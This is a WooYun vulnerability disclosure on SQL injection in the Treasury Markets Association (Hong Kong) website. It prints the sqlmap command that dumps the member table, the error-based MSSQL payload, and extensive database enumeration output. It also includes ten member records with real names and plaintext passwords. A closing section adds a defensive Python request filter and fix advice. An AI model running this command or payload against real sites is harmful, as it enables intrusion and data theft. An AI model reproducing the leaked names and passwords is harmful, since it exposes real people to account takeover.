Vulnerability Summary

Defect ID: wooyun-2015-0153995

Vulnerability Title: POST-based SQL injection at a Treasury Markets Association (財資市場公會) endpoint (over a million history records / 200,000 backup files / user names, passwords and e-mail addresses leaked) (Hong Kong)

Vendor: Treasury Markets Association (財資市場公會)

Author: 路人甲

Submitted: 2015-11-25 09:33

Fix time: 2015-11-30 09:34

Disclosed: 2015-11-30 09:34

Vulnerability Type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: handed to a third-party partner organisation (HKCERT, the Hong Kong Internet Emergency Coordination Centre) for handling

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2015-11-25: Details sent to the vendor; awaiting the vendor's handling
2015-11-30: The vendor has actively ignored the vulnerability; details are disclosed to the public

Brief description:

The Treasury Markets Association (TMA) was incorporated through the institutionalisation of the Treasury Markets Forum of Hong Kong and the merger with ACI-The Financial Markets Association of Hong Kong in 2005. Principal functions of the TMA include promoting co-operation and synergy among market practitioners with a view to enhancing professionalism and the overall competitiveness of the treasury markets in Hong Kong, thereby maintaining the role as an international financial centre.

Detailed description:

Address: http://**.**.**.**

python sqlmap.py -u "http://**.**.**.**" -p textfield --technique=E --form --random-agent --batch -D db_tma -T dbo.tblMember -C MemberId,MemberLName,MemberFullName,MemberPwd,MemberEmail --dump --start 1 --stop 10


Database: db_tma
+------------------------------------+---------+
| Table | Entries |
+------------------------------------+---------+
| dbo.tblmkt_fixhistory | 690727 |
Database: db_tma_20121217
+------------------------------------+---------+
| Table | Entries |
+------------------------------------+---------+
| dbo.tblmkt_fixhistory | 471251 |


Database: msdb
+------------------------------------+---------+
| Table | Entries |
+------------------------------------+---------+
| dbo.backupfile | 207040 |


Database: db_tma
+------------------------------------+---------+
| Table | Entries |
+------------------------------------+---------+
| dbo.tblMember | 3036 |
Ten rows selected for display:
Database: db_tma
Table: tblMember
[10 entries]
+----------+-------------+---------------------------+-----------+------------------------------------+
| MemberId | MemberLName | MemberFullName | MemberPwd | MemberEmail |
+----------+-------------+---------------------------+-----------+------------------------------------+
| 1 | Yam | <blank> | joseph | @.com |
| 100 | Poon | <blank> | tpoon1 | kcpoon@**.**.**.** |
| 1000 | Lee | Lee Angela | <blank> | <blank> |
| 100002 | <blank> | Cheung Anna | <blank> | acheung@**.**.**.** |
| 1001 | Wong | Wong Wai Man, Peter | PWTMA2006 | <blank> |
| 110 | Tse | Tse Wing Yau | 20152015 | <blank> |
| 1101 | Tang | Tang Wan Shing | hellohk | billtang1030@**.**.**.** |
| 1102 | Tsang | Tsang Man Leung, Hugh | <blank> | hughml_tsang@**.**.**.** |
| 1103 | Wong | Wong Wing Cheong, Stephen | hellohk | <blank> |
| 1200 | Thong | Thong Hiu Chong, Elmen | smart123 | <blank> |
+----------+-------------+---------------------------+-----------+------------------------------------+

Proof of vulnerability:

---
Parameter: textfield (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: textfield=aNIB'+(SELECT 'BZrt' WHERE 6983=6983 AND 7380=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7380=7380) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+CHAR(113))))+'&imageField.x=1&imageField.y=1
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current user: 'usr_tma'
current user is DBA: False
database management system users [2]:
[*] sa
[*] usr_tma
database management system users password hashes:
[*] sa [1]:
password hash: NULL
[*] usr_tma [1]:
password hash: NULL
Database: db_tma
+------------------------------------+---------+
| Table | Entries |
+------------------------------------+---------+
| dbo.tblmkt_fixhistory | 690727 |
| dbo.tblmkt_fix | 156464 |
| dbo.tblmkt_fix_20150922 | 138446 |
| dbo.tblmkt_fix_20150713 | 113983 |
| dbo.tblmkt_fix_20150421 | 112229 |
| dbo.tblmkt_fix_20130923 | 94418 |
| dbo.tblmkt_fix_20130705 | 64130 |
| dbo.tblCourse | 64058 |
| dbo.tblCourse_20150929 | 62219 |
| dbo.tblmkt_fix_20121224 | 58338 |
| dbo.tblCourse_20140213 | 53987 |
| dbo.tblCourse_20140124 | 53798 |
| dbo.tblCourse_v1 | 53798 |
| dbo.tblCourse_20130916 | 50453 |
| dbo.tblCourse_20121224xxx | 47104 |
| dbo.tblFee | 17409 |
| dbo.tblFee_20121116 | 12595 |
| dbo.CPT1 | 11321 |
| dbo.tblMemberHistory | 8816 |
| dbo.tblData | 6793 |
| dbo.tblMemberRenew | 6459 |
| dbo.tblMemberRenew_history | 4552 |
| dbo.tblMemberHistory_20121218 | 3973 |
| dbo.tblbank_intrate | 3658 |
| dbo.tblMember | 3036 |
| dbo.tblMember_20121218 | 2843 |
| dbo.tblMember_20121224 | 2843 |
| dbo.countDuplicateMemberId | 2739 |
| dbo.tblmkt_fix_20120318 | 2532 |
| dbo.tblCount | 1857 |
| dbo.tblMemberRenew_20121218 | 1703 |
| dbo.tblMemberRenew_20121218_notuse | 1703 |
| dbo.tblMemberRenew_20121212 | 1691 |
| dbo.tblEduct | 646 |
| dbo.tblEduct_20121224 | 490 |
| dbo.tblJob | 404 |
| dbo.tblCPT | 257 |
| dbo.tblNews | 185 |
| dbo.tblBloomberg | 157 |
| dbo.tblmkt_fixsetting | 143 |
| dbo.tblmkt_fixsetting_20140916 | 111 |
| dbo.tblmkt_fixsetting_20150713 | 111 |
| dbo.tblComm | 100 |
| dbo.tblbank_holiday | 89 |
| dbo.tblmkt_fixsetting_20130705 | 84 |
| dbo.tblPublication | 53 |
| dbo.seed | 37 |
| dbo.tblEventSection | 30 |
| dbo.tblmkt_fixtyphoon_dtl | 23 |
| dbo.tblUrl | 21 |
| dbo.tblEventSession | 14 |
| dbo.tblbank | 13 |
| dbo.tblEvent | 12 |
| dbo.tblGroup | 12 |
| dbo.tblbank_intrate_config | 11 |
| dbo.tblNB | 11 |
| dbo.tblmkt_fixtyphoon | 10 |
| dbo.tblConfig | 8 |
| dbo.tblemailformat | 8 |
| dbo.tblemailformat_20140113 | 8 |
| dbo.tblemailformat_20140117 | 8 |
| dbo.tblemailformat_20140121 | 8 |
| dbo.tblemailformat_20141013 | 8 |
| dbo.tblemailformat_20141124 | 8 |
| dbo.tblemailformat_20151013 | 8 |
| dbo.tblemailformat_20151113 | 8 |
| dbo.tblRegForm | 8 |
| dbo.tblemailformat_20121224 | 7 |
| dbo.tblemailformat_20131209 | 7 |
| dbo.tblemailformat_20131230 | 7 |
| dbo.tblStatus | 5 |
| dbo.tblstaff | 4 |
| dbo.tblPMComm | 3 |
| dbo.tblPubCat | 3 |
| dbo.tblbank_staff | 2 |
| dbo.tblAudit | 1 |
| dbo.tblbank_intrate_typhoon | 1 |
| dbo.tblbank_msg | 1 |
| dbo.tblBg | 1 |
| dbo.tblConsult | 1 |
| dbo.tblGoverence | 1 |
| dbo.tblMemberRenewSetting | 1 |
| dbo.tblObj | 1 |
| dbo.tblSys | 1 |
+------------------------------------+---------+
Database: db_tma_20121217
+------------------------------------+---------+
| Table | Entries |
+------------------------------------+---------+
| dbo.tblmkt_fixhistory | 471251 |
| dbo.tblmkt_fix | 58141 |
| dbo.tblCourse | 47000 |
| dbo.tblFee | 12606 |
| dbo.tblFee_20121116 | 12595 |
| dbo.tblMemberHistory | 3966 |
| dbo.tblMember | 2843 |
| dbo.countDuplicateMemberId | 2739 |
| dbo.tblmkt_fix_20120318 | 2532 |
| dbo.tblbank_intrate | 2072 |
| dbo.tblbank_intrate_history | 1910 |
| dbo.tblCount | 1857 |
| dbo.tblMemberRenew | 1703 |
| dbo.tblMemberRenew_20121212 | 1691 |
| dbo.tblCPT | 189 |
| dbo.tblNews | 157 |
| dbo.tblComm | 96 |
| dbo.tblBloomberg | 85 |
| dbo.tblmkt_fixsetting | 74 |
| dbo.tblPublication | 36 |
| dbo.seed | 35 |
| dbo.tblEventSection | 30 |
| dbo.tblUrl | 21 |
| dbo.tblbank_holiday | 20 |
| dbo.tblEventSession | 14 |
| dbo.tblbank | 13 |
| dbo.tblEvent | 12 |
| dbo.tblGroup | 12 |
| dbo.tblbank_intrate_config | 11 |
| dbo.tblNB | 10 |
| dbo.tblConfig | 8 |
| dbo.tblRegForm | 8 |
| dbo.tblemailformat | 6 |
| dbo.tblStatus | 5 |
| dbo.tblPMComm | 3 |
| dbo.tblstaff | 3 |
| dbo.tblbank_staff | 2 |
| dbo.tblbank_intrate_typhoon | 1 |
| dbo.tblbank_msg | 1 |
| dbo.tblBg | 1 |
| dbo.tblMemberRenewSetting | 1 |
| dbo.tblSys | 1 |
+------------------------------------+---------+
Database: msdb
+------------------------------------+---------+
| Table | Entries |
+------------------------------------+---------+
| dbo.backupfile | 207040 |
| dbo.backupset | 103520 |
| dbo.backupmediafamily | 103519 |
| dbo.backupmediaset | 103519 |
| dbo.syspolicy_configuration | 4 |
+------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: master
Table: sql_logins
[1 column]
+---------------+-----------+
| Column | Type |
+---------------+-----------+
| password_hash | varbinary |
+---------------+-----------+
Database: msdb
Table: backupset
[1 column]
+-----------------------+------+
| Column | Type |
+-----------------------+------+
| is_password_protected | bit |
+-----------------------+------+
Database: msdb
Table: backupmediaset
[1 column]
+-----------------------+------+
| Column | Type |
+-----------------------+------+
| is_password_protected | bit |
+-----------------------+------+
Database: msdb
Table: backupset
[1 entry]
+-----------------------+
| is_password_protected |
+-----------------------+
| 0 |
+-----------------------+
Database: msdb
Table: backupmediaset
[1 entry]
+-----------------------+
| is_password_protected |
+-----------------------+
| 0 |
+-----------------------+
available databases [11]:
[*] db_betav1
[*] db_oldweb_tma
[*] db_tma
[*] db_tma_20121217
[*] db_tma_20121223
[*] db_tma_test
[*] db_tma_test2
[*] master
[*] model
[*] msdb
[*] tempdb
Database: db_tma
Table: tblMember
[50 columns]
+--------------------+----------+
| Column             | Type     |
+--------------------+----------+
| Member2Addr1       | nvarchar |
| MemberACIDC        | nvarchar |
| MemberACIDCYear    | nvarchar |
| MemberACIDip       | nvarchar |
| MemberACIDipYear   | nvarchar |
| MemberACIM         | nvarchar |
| MemberACIQuali     | nvarchar |
| MemberACISC        | nvarchar |
| MemberACISCYear    | nvarchar |
| MemberAddr1        | nvarchar |
| MemberAddr2        | nvarchar |
| MemberAddr3        | nvarchar |
| MemberCease        | nvarchar |
| MemberCName        | nvarchar |
| MemberCollege      | nvarchar |
| MemberContactTel   | nvarchar |
| MemberCreateDate   | datetime |
| Memberdisclosure   | char     |
| MemberDOJ          | nvarchar |
| MemberEmail        | nvarchar |
| MemberExpectGrad   | datetime |
| MemberField        | nvarchar |
| MemberFName        | nvarchar |
| MemberFullName     | nvarchar |
| MemberId           | int      |
| MemberInst         |          |
| MemberLName        | nvarchar |
| MemberLogin        | nvarchar |
| MemberMajor        |          |
| MemberMTel         |          |
| MemberPosition     | nvarchar |
| MemberProposer     | nvarchar |
| MemberProposerInst | nvarchar |
| MemberPwd          | nvarchar |
| MemberRenewal      | nvarchar |
| MemberRenewAlert   |          |
| MemberRmk          | nvarchar |
| MemberSeconder     |          |
| MemberSeconderInst | nvarchar |
| MemberSex          | nvarchar |
| MemberStatus       |          |
| MemberStudentId    | nvarchar |
| MemberStudyForm    | datetime |
| MemberStudyTo      | datetime |
| MemberTel          | nvarchar |
| MemberTitle        |          |
| MemberTMACDSYear   |          |
| MemberTMC          | nvarchar |
| MemberTMCYear      |          |
| OldMemberGroup     |          |
+--------------------+----------+


Remediation:

Deploy a WAF.
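The request-inspection logic a WAF in front of this form would need in order to catch the error-based payload shown in the proof section, as an added example that is not part of the report or of TMA's systems; the rule names, the two-rule threshold and the sample request bodies are assumptions constructed for this example.

```python
import re
from urllib.parse import parse_qs, urlencode

# Error-based MSSQL payload sqlmap reported for the "textfield" POST parameter
# (copied from the report's proof section; only the harness around it is added).
SQLMAP_PAYLOAD = (
    "aNIB'+(SELECT 'BZrt' WHERE 6983=6983 AND 7380=CONVERT(INT,(SELECT CHAR(113)"
    "+CHAR(112)+CHAR(118)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7380=7380) THEN "
    "CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+CHAR(113))))+'"
)

# Rule names and patterns are assumptions of this example, not a product's ruleset.
# Each keys on one feature of the technique above: a closed string literal followed by
# a subquery, CONVERT(INT, <subquery>) whose failing cast leaks data into the error,
# the CHAR()-built marker strings around the extracted value, and the n=n tautology.
RULES = [
    ("quote_then_subquery", re.compile(r"'\s*\+?\s*\(\s*SELECT\b", re.I)),
    ("convert_int_on_subquery", re.compile(r"CONVERT\s*\(\s*INT\s*,\s*\(\s*SELECT\b", re.I)),
    ("char_marker_chain", re.compile(r"(?:CHAR\s*\(\s*\d+\s*\)[\s+]+){3,}", re.I)),
    ("tautology", re.compile(r"\b(\d+)\s*=\s*\1\b")),
]

def matched_rules(value):
    """Return the names of every rule that fires on one decoded form value."""
    return [name for name, rx in RULES if rx.search(value)]

def inspect_post_body(body, min_rules=2):
    """Decode an x-www-form-urlencoded body and map each field that trips at
    least `min_rules` rules to the rule names. Requiring two rules keeps a lone
    "5=5" or an apostrophe in a surname from raising an alert on its own."""
    findings = {}
    for field, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            hits = matched_rules(value)
            if len(hits) >= min_rules:
                findings[field] = hits
    return findings

# Constructed request bodies, built the way a browser would encode the form
# (so the '+' concatenation operators travel as %2B and survive decoding).
FORM_EXTRA = {"imageField.x": "1", "imageField.y": "1"}
SAMPLE_BODIES = {
    "benign_search": urlencode({"textfield": "treasury markets", **FORM_EXTRA}),
    "quoted_surname": urlencode({"textfield": "O'Brien 5=5", **FORM_EXTRA}),
    "sqlmap_error_based": urlencode({"textfield": SQLMAP_PAYLOAD, **FORM_EXTRA}),
}

if __name__ == "__main__":
    for label, body in SAMPLE_BODIES.items():
        print(label, inspect_post_body(body) or "clean")
```

Signature rules only cover the payload shapes they were written for, so a WAF is a stopgap; the durable fix is to pass the textfield value to the query as a bound parameter instead of concatenating it, and a member table holding plaintext MemberPwd values (as the dump shows) needs hashing regardless of the injection.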

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability Response

Vendor response:

Severity: No impact, ignored by vendor

Ignored at: 2015-11-30 09:34

Vendor reply:

Latest status:

None yet